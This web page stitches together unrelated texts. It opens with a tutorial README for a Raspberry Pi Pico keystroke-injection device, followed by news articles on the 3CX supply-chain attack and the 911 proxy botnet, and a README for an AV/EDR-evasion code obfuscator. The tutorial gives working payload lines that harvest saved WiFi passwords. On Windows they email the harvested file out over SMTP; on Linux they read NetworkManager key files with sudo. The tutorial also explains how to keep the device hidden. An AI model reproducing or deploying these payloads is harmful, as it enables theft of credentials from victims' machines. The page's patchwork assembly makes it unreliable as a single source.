Login
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.
We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.
| STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
Note:
After sending data over the email, the
.txtfile is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.
| STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
| STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
| STRING echo PASSWORD | sudo -S echo |
| STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
FreshRSS echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICKwhere PASSWORD is your account's password and USBSTICK is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
| Wireless_Network_Name Password | |
| --------------------- -------- | |
| WLAN1 pass1 | |
| WLAN2 pass2 | |
| WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.ddThis pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock bug.sudo.We learned some remarkable new details this week about the recent supply-chain attack on VoIP software provider 3CX. The lengthy, complex intrusion has all the makings of a cyberpunk spy novel: North Korean hackers using legions of fake executive accounts on LinkedIn to lure people into opening malware disguised as a job offer; malware targeting Mac and Linux users working at defense and cryptocurrency firms; and software supply-chain attacks nested within earlier supply chain attacks.
Researchers at ESET say this job offer from a phony HSBC recruiter on LinkedIn was North Korean malware masquerading as a PDF file.
In late March 2023, 3CX disclosed that its desktop applications for both Windows and macOS were compromised with malicious code that gave attackers the ability to download and run code on all machines where the app was installed. 3CX says it has more than 600,000 customers and 12 million users in a broad range of industries, including aerospace, healthcare and hospitality.
3CX hired incident response firm Mandiant, which released a report on Wednesday that said the compromise began in 2022 when a 3CX employee installed a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER, a software package provided by Trading Technologies.
“This is the first time Mandiant has seen a software supply chain attack lead to another software supply chain attack,” reads the April 20 Mandiant report.
Mandiant found the earliest evidence of compromise uncovered within 3CX’s network was through the VPN using the employee’s corporate credentials, two days after the employee’s personal computer was compromised.
“Eventually, the threat actor was able to compromise both the Windows and macOS build environments,” 3CX said in an April 20 update on their blog.
Mandiant concluded that the 3CX attack was orchestrated by the North Korean state-sponsored hacking group known as Lazarus, a determination that was independently reached earlier by researchers at Kaspersky Lab and Elastic Security.
Mandiant found the compromised 3CX software would download malware that sought out new instructions by consulting encrypted icon files hosted on GitHub. The decrypted icon files revealed the location of the malware’s control server, which was then queried for a third stage of the malware compromise — a password stealing program dubbed ICONICSTEALER.
The double supply chain compromise that led to malware being pushed out to some 3CX customers. Image: Mandiant.
Meanwhile, the security firm ESET today published research showing remarkable similarities between the malware used in the 3CX supply chain attack and Linux-based malware that was recently deployed via fake job offers from phony executive profiles on LinkedIn. The researchers said this was the first time Lazarus had been spotted deploying malware aimed at Linux users.
As reported in a series last summer here, LinkedIn has been inundated this past year by fake executive profiles for people supposedly employed at a range of technology, defense, energy and financial companies. In many cases, the phony profiles spoofed chief information security officers at major corporations, and some attracted quite a few connections before their accounts were terminated.
Mandiant, Proofpoint and other experts say Lazarus has long used these bogus LinkedIn profiles to lure targets into opening a malware-laced document that is often disguised as a job offer. This ongoing North Korean espionage campaign using LinkedIn was first documented in August 2020 by ClearSky Security, which said the Lazarus group operates dozens of researchers and intelligence personnel to maintain the campaign globally.
Microsoft Corp., which owns LinkedIn, said in September 2022 that it had detected a wide range of social engineering campaigns using a proliferation of phony LinkedIn accounts. Microsoft said the accounts were used to impersonate recruiters at technology, defense and media companies, and to entice people into opening a malicious file. Microsoft found the attackers often disguised their malware as legitimate open-source software like Sumatra PDF and the SSH client Putty.
Microsoft attributed those attacks to North Korea’s Lazarus hacking group, although they’ve traditionally referred to this group as “ZINC“. That is, until earlier this month, when Redmond completely revamped the way it names threat groups; Microsoft now references ZINC as “Diamond Sleet.”
The ESET researchers said they found a new fake job lure tied to an ongoing Lazarus campaign on LinkedIn designed to compromise Linux operating systems. The malware was found inside of a document that offered an employment contract at the multinational bank HSBC.
“A few weeks ago, a native Linux payload was found on VirusTotal with an HSBC-themed PDF lure,” wrote ESET researchers Peter Kalnai and Marc-Etienne M.Leveille. “This completes Lazarus’s ability to target all major desktop operating systems. In this case, we were able to reconstruct the full chain, from the ZIP file that delivers a fake HSBC job offer as a decoy, up until the final payload.”
ESET said the malicious PDF file used in the scheme appeared to have a file extension of “.pdf,” but that this was a ruse. ESET discovered that the dot in the filename wasn’t a normal period but instead a Unicode character (U+2024) representing a “leader dot,” which is often used in tables of contents to connect section headings with the page numbers on which those sections begin.
“The use of the leader dot in the filename was probably an attempt to trick the file manager into treating the file as an executable instead of a PDF,” the researchers continued. “This could cause the file to run when double-clicked instead of opening it with a PDF viewer.”
ESET said anyone who opened the file would see a decoy PDF with a job offer from HSBC, but in the background the executable file would download additional malware payloads. The ESET team also found the malware was able to manipulate the program icon displayed by the malicious PDF, possibly because fiddling with the file extension could cause the user’s system to display a blank icon for the malware lure.
Kim Zetter, a veteran Wired.com reporter and now independent security journalist, interviewed Mandiant researchers who said they expect “many more victims” will be discovered among the customers of Trading Technologies and 3CX now that news of the compromised software programs is public.
“Mandiant informed Trading Technologies on April 11 that its X_Trader software had been compromised, but the software maker says it has not had time to investigate and verify Mandiant’s assertions,” Zetter wrote in her Zero Day newsletter on Substack. For now, it remains unclear whether the compromised X_Trader software was downloaded by people at other software firms.
If there’s a silver lining here, the X_Trader software had been decommissioned in April 2020 — two years before the hackers allegedly embedded malware in it.
“The company hadn’t released new versions of the software since that time and had stopped providing support for the product, making it a less-than-ideal vector for the North Korean hackers to infect customers,” Zetter wrote.
Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.
Codecepticon allows you to obfuscate and rewrite code, but also provides features such as rewriting the command line as well.
! Before we begin !
This documentation is on how to install and use Codecepticon only. Compilation, usage, and support for tools like Rubeus and SharpHound will not be provided. Refer to each project's repo separately for more information.
Codecepticon is actively developed/tested in VS2022, but it should work in VS2019 as well. Any tickets/issues created for VS2019 and below, will not be investigated unless the issue is reproducible in VS2022. So please use the latest and greatest VS2022.
The following packages MUST be v3.9.0, as newer versions have the following issue which is still open: dotnet/roslyn#58463
Codecepticon checks the version of these packages on runtime and will inform you if the version is different to v3.9.0.
It cannot be stressed this enough: always test your obfuscated code locally first.
Open Codecepticon, wait until all NuGet packages are downloaded and then build the solution.
There are two ways to use Codecepticon, either by putting all arguments in the command line or by passing a single XML configuration file. Due to the high level of supported customisations, It's not recommended manually going through --help output to try and figure out which parameters to use and how. Use CommandLineGenerator.html and generate your command quickly:
The command generator's output format can be either Console or XML, depending what you prefer. Console commands can be executed as:
Codecepticon.exe --action obfuscate --module csharp --verbose ...etc
While when using an XML config file, as:
Codecepticon.exe --config C:\Your\Path\To\The\File.xml
If you want to deep dive into Codecepticon's functionality, check out this document.
For tips you can use, check out this document.
Obfuscating a C# project is simple, simply select the solution you wish to target. Note that a backup of the solution itself will not be taken, and the current one will be the one that will be obfuscated. Make sure that you can independently compile the target project before trying to run Codecepticon against it.
The VBA obfuscation works against source code itself rather than a Microsoft Office document. This means that you cannot pass a doc(x) or xls(x) file to Codecepticon. It will have to be the source code of the module itself (press Alt-F11 and copy the code from there).
Due to the complexity of PowerShell scripts, along with the freedom it provides in how to write scripts it is challenging to cover all edge cases and ensure that the obfuscated result will be fully functional. Although it's expected for Codecepticon to work fine against simple scripts/functionality, running it against complex ones such as PowerView will not work - this is a work in progress.
After obfuscating an application or a script, it is very likely that the command line arguments have also been renamed. The solution to this is to use the HTML mapping file to find what the new names are. For example, let's convert the following command line:
SharpHound.exe --CollectionMethods DCOnly --OutputDirectory C:\temp\
By searching through the HTML mapping file for each argument, we get:
And by replacing all strings the result is:
ObfuscatedSharpHound.exe --AphylesPiansAsp TurthsTance --AnineWondon C:\temp\
However, some values may exist in more than one category:
Therefore it is critical to always test your result in a local environment first.
The compiled output includes a lot of dependency DLLs, which due to licensing requirements we can't re-distribute without written consent.
No, Codecepticon should work with everything. The profiles are just a bit of extra tweaks that are done to the target project in order to make it more reliable and easier to work with.
But as all code is unique, there will be instances where obfuscating a project will end up with an error or two that won't allow it to be compiled or executed. In this case a new profile may be in order - please raise a new issue if this is the case.
Same principle applies to PowerShell/VBA code - although those currently have no profiles that come with Codecepticon, it's an easy task to add if some are needed.
For reporting bugs and suggesting new features, please create an issue.
For submitting pull requests, please see the Contributions section.
Before running Codecepticon make sure you can compile a clean version of the target project. Very often when this issue appears, it's due to missing dependencies for the target solution rather than Codecepticon. But if it still doesn't compile:
I will do my best, but as PowerShell scripts can be VERY complex and the PSParser isn't as advanced as Roslyn for C#, no promises can be made. Same applies for VBA/VB6.
You may at some point encounter the following error:
Still trying to get to the bottom of this one, a quick fix is to uninstall and reinstall the System.Collections.Immutable package, from the NuGet Package Manager.
Whether it's a typo, a bug, or a new feature, Codecepticon is very open to contributions as long as we agree on the following:
The 911 service as it exists today.
For the past seven years, an online service known as 911 has sold access to hundreds of thousands of Microsoft Windows computers daily, allowing customers to route their Internet traffic through PCs in virtually any country or city around the globe — but predominantly in the United States. 911 says its network is made up entirely of users who voluntarily install its “free VPN” software. But new research shows the proxy service has a long history of purchasing installations via shady “pay-per-install” affiliate marketing schemes, some of which 911 operated on its own.
911[.]re is one of the original “residential proxy” networks, which allow someone to rent a residential IP address to use as a relay for his/her Internet communications, providing anonymity and the advantage of being perceived as a residential user surfing the web.
From a website’s perspective, the IP traffic of a residential proxy network user appears to originate from the rented residential IP address, not from the proxy service customer. These services can be used in a legitimate manner for several business purposes — such as price comparisons or sales intelligence — but they are massively abused for hiding cybercrime activity because they can make it difficult to trace malicious traffic to its original source.
Residential proxy services are often marketed to people seeking the ability to evade country-specific blocking by the major movie and media streaming providers. But some of them — like 911 — build their networks in part by offering “free VPN” or “free proxy” services that are powered by software which turns the user’s PC into a traffic relay for other users. In this scenario, users indeed get to use a free VPN service, but they are often unaware that doing so will turn their computer into a proxy that lets others use their Internet address to transact online.
The current prices for 911’s proxies.
Researchers at the University of Sherbrooke in Canada recently published an analysis of 911, and found there were roughly 120,000 PCs for rent via the service, with the largest number of them located in the United States.
“The 911[.]re network uses at least two free VPN services to lure its users to install a malware-like software that achieves persistence on the user’s computer,” the researchers wrote. “During the research we identified two free VPN services that [use] a subterfuge to lure users to install software that looks legitimate but makes them part of the network. These two software are currently unknown to most if not all antivirus companies.”
A depiction of the Proxygate service. Image: University of Sherbrooke.
The researchers concluded that 911 is supported by a “mid scale botnet-like infrastructure that operates in several networks, such as corporate, government and critical infrastructure.” The Canadian team said they found many of the 911 nodes available for rent were situated within several major US-based universities and colleges, critical infrastructures such as clean water, defense contractors, law enforcement and government networks.
Highlighting the risk that 911 nodes could pose to internal corporate networks, they observed that “the infection of a node enables the 911.re user to access shared resources on the network such as local intranet portals or other services.”
“It also enables the end user to probe the LAN network of the infected node,” the paper continues. “Using the internal router, it would be possible to poison the DNS cache of the LAN router of the infected node, enabling further attacks.”
The 911 user interface, as it existed when the service first launched in 2016.
A review of the clues left behind by 911’s early days on the Internet paint a more complete picture of this long-running proxy network. The domain names used by 911 over the years have a few common elements in their original WHOIS registration records, including the address ustraffic@qq.com and a Yunhe Wang from Beijing.
That ustraffic email is tied to a small number of interesting domains, including browsingguard[.]com, cleantraffic[.]net, execlean[.]net, proxygate[.]net, and flashupdate[.]net.
A cached copy of flashupdate[.]net available at the Wayback Machine shows that in 2016 this domain was used for the “ExE Bucks” affiliate program, a pay-per-install business which catered to people already running large collections of hacked computers or compromised websites. Affiliates were paid a set amount for each installation of the software, with higher commissions for installs in more desirable nations, particularly Europe, Canada and the United States.
“We load only one software — it’s a Socks5 proxy program,” read the message to ExE Bucks affiliates. The website said affiliates were free to spread the proxy software by any means available (i.e. “all promotion methods allowed”). The website’s copyright suggests the ExE Bucks affiliate program dates back to 2012.
A cached copy of flashupdate[.]net circa 2016, which shows it was the home of a pay-per-install affiliate program that incentivized the silent installation of its software. “FUD” in the ad above refers to software and download links that are “Fully UnDetectable” as suspicious or malicious by all antivirus software.
Another domain tied to the ustraffic@qq.com email in 2016 was ExeClean[.]net, a service that advertised to cybercriminals seeking to obfuscate their malicious software so that it goes undetected by all or at least most of the major antivirus products on the market.
“Our technology ensures the maximum security from reverse engineering and antivirus detections,” ExEClean promised.
The Exe Clean service made malware look like goodware to antivirus products.
Yet another domain connected to the ustraffic email is p2pshare[.]net, which advertised “free unlimited internet file-sharing platform” for those who agreed to install their software.
p2pshare.net, which bundled 911 proxy with an application that promised access to free unlimited internet file-sharing.
Still more domains associated with ustraffic@qq.com suggest 911’s proxy has been disguised as security updates for video player plugins, including flashplayerupdate[.]xyz, mediaplayerupdate[.]xyz, and videoplayerupdate[.]xyz.
The earliest version of the 911 website available from the Wayback Machine is from 2016. A sister service called proxygate[.]net launched roughly a year prior to 911 as a “free” public test of the budding new residential proxy service. “Basically using clients to route for everyone,” was how Proxygate described itself in 2016.
For more than a year after its founding, the 911 website was written entirely in Simplified Chinese. The service has only ever accepted payment via virtual currencies such as Bitcoin and Monero, as well as Alipay and China UnionPay, both payment platforms based in China.
Initially, the terms and conditions of 911’s “End User License Agreement (EULA) named a company called Wugaa Enterprises LLC, which was registered in California in 2016. Records from the California Secretary of State office show that in November 2016, Wugaa Enterprises said it was in the Internet advertising business, and had named as its CEO as one Nicolae Aurelian Mazgarean of Brasov, Romania.
A search of European VAT numbers shows the same Brasov, RO address tied to an enterprise called PPC Leads SRL (in the context of affiliate-based marketing, “PPC” generally refers to the term “pay-per-click”).
911’s EULA would later change its company name and address in 2017, to International Media Ltd. in the British Virgin Islands. That is the same information currently displayed on the 911 website.
The EULA attached to 911 software downloaded from browsingguard[.]com (tied to the same ustraffic@qq email that registered 911) references a company called Gold Click Limited. According to the UK Companies House, Gold Click Limited was registered in 2016 to a 34-year-old Yunhe Wang from Beijing City. Many of the WHOIS records for the above mentioned domains also include the name Yunhe Wang, or some variation thereof.
In a response to questions from KrebsOnSecurity, 911 said the researchers were wrong, and that 911 has nothing to do with any of the other domains mentioned above.
“We have 911 SDK link and how it works described clearly in the “Terms of use” of affiliated partners products, and we have details of how the community powered network works on our webpages,” read an email response.
“Besides that, for protecting the end users, we banned many domains’ access and blocked the vulnerable ports, e.g. spamming emails, and torrent is not possible from the 911 network,” the reply continued. “Same as scanning and many others…Accessing to the Lan network and router is also blocked. We are monitoring 911 user’s account closely, once any abnormal behavior detected, we suspend the user’s account right away.”
911 has remained one of the most popular services among denizens of the cybercrime underground for years, becoming almost shorthand for connecting to that “last mile” of cybercrime. Namely, the ability to route one’s malicious traffic through a computer that is geographically close to the consumer whose credit card they’re about to charge at some website, or whose bank account they’re about to empty.
Given the frequency with which 911 has been praised by cybercrooks on the top forums, it was odd to find the proprietors of 911 do not appear to have created any official support account for the service on any of several dozen forums reviewed by this author going back a decade. However there are two cybercriminal identities on the forums that have responded to individual 911 help requests, and who promoted the sale of 911 accounts via their handles.
Both of these identities were active on the crime forum fl.l33t[.]su between 2016 and 2019. The user “Transfer” advertised and sold access to 911 from 2016 to 2018, amid many sales threads where they advertised expensive electronics and other consumer goods that were bought online with stolen credit cards.
In a 2017 discussion on fl.l33t[.]su, the user who picked the handle “527865713” could be seen answering private messages in response to help inquiries seeking someone at 911. That identity is tied to an individual who for years advertised the ability to receive and relay large wire transfers from China.
One ad from this user in 2016 offered a “China wire service” focusing on Western Union payments, where “all transfers are accepted in China.” The service charged 20 percent of all “scam wires,” unauthorized wire transfers resulting from bank account takeovers or scams like CEO impersonation schemes.
In August 2021, 911’s biggest competitor — a 15-year-old proxy network built on malware-compromised PCs called VIP72 — abruptly closed up shop. Almost overnight, an overwhelming number of former VIP72 customers began shifting their proxy activities to 911.
The login page for VIP72, until recently 911’s largest competitor.
That’s according to Riley Kilmer, co-founder of Spur.us — a security company that monitors anonymity services. Kilmer said 911 also gained an influx of new customers after the Jan. 2022 closure of LuxSocks, another malware-based proxy network.
“911’s user base skyrocketed after VIP72 and then LuxSocks went away,” Kilmer said. “And it’s not hard to see why. 911 and VIP72 are both Windows-based apps that operate in a similar way, where you buy private access to IPs.”
Kilmer said 911 is interesting because it appears to be based in China, while nearly all of the other major proxy networks are Russian-backed or Russian-based.
“They have two basic methods to get new IPs,” Kilmer said. “The free VPN apps, and the other is trojanized torrents. They’ll re-upload Photoshop and stuff like that so that it’s backdoored with the 911 proxy. They claim the proxy is bundled with legitimate software and that users all agree to their Terms of Service, meanwhile they can hide behind the claim that it was some affiliate who installed the software, not them.”
Kilmer said at last count, 911 had nearly 200,000 proxy nodes for sale, spanning more than 200 countries: The largest geographic concentration is the United States, where more than 42,000 proxies are currently for rent by the service.
Beware of “free” or super low-cost VPN services. Proper VPN services are not cheap to operate, so the revenue for the service has to come from somewhere. And there are countless “free” VPN services that are anything but, as we’ve seen with 911.
In general, the rule of thumb for transacting online is that if you’re not the paying customer, then you and/or your devices are probably the product that’s being sold to others. Many free VPN services will enlist users as VPN nodes for others to use, and some even offset costs by collecting and reselling data from their users.
All VPN providers claim to prioritize the privacy of their users, but many then go on to collect and store all manner of personal and financial data from those customers. Others are fairly opaque about their data collection and retention policies.
I’ve largely avoided wading into the fray about which VPN services are best, but there are so many shady and just plain bad ones out there that I’d be remiss if I didn’t mention one VPN provider whose business practices and transparency of operation consistently distinguish them from the rest. If maintaining your privacy and anonymity are primary concerns for you as a VPN user, check out Mullvad.net.
Let me make clear that KrebsOnSecurity does not have any financial or business ties to this company (for the avoidance of doubt, this post doesn’t even link to them). I mention it only because I’ve long been impressed with their candor and openness, and because Mullvad goes out of its way to discourage customers from sharing personal or financial data.
To that end, Mullvad will even accept mailed payments of cash to fund accounts, quite a rarity these days. More importantly, the service doesn’t ask users to share phone numbers, email addresses or any other personal information. Nor does it require customers to create passwords: Each subscription can be activated just by entering a Mullvad account number (woe to those who lose their account number).
I wish more companies would observe this remarkably economical security practice, which boils down to the mantra, “You don’t have to protect what you don’t collect.”
Update, July 24, 11:15 a.m. ET: 911’s homepage now includes a banner saying the service has halted new registrations and payments. “We are reviewing our network and adding a series of security measures to prevent misuse of our services,” the message reads. “Proxy balance top-up and new user registration are closed. We are reviewing every existing user, to ensure their usage is legit and [in] compliance with our Terms of Service.”
Update, July 30, 10:07 a.m. ET: 911 announced on July 28 that it is permanently closing down, following a series of data breaches this month that 911 says resulted in the deletion of customer data.
eleceye-1200
